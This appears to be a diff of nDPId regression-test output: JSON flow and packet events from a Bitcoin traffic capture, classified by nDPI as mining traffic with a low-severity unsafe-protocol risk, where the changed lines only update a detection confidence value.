ztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":215,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":215,"packets-processed":214,"total-skipped-flows":0,"total-l4-payload-len":260266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1301328538215} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":495,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":495,"packets-processed":494,"total-skipped-flows":0,"total-l4-payload-len":520135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1301329138452} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":622,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":622,"packets-processed":621,"total-skipped-flows":0,"total-l4-payload-len":537564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1301329743430} 
-00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 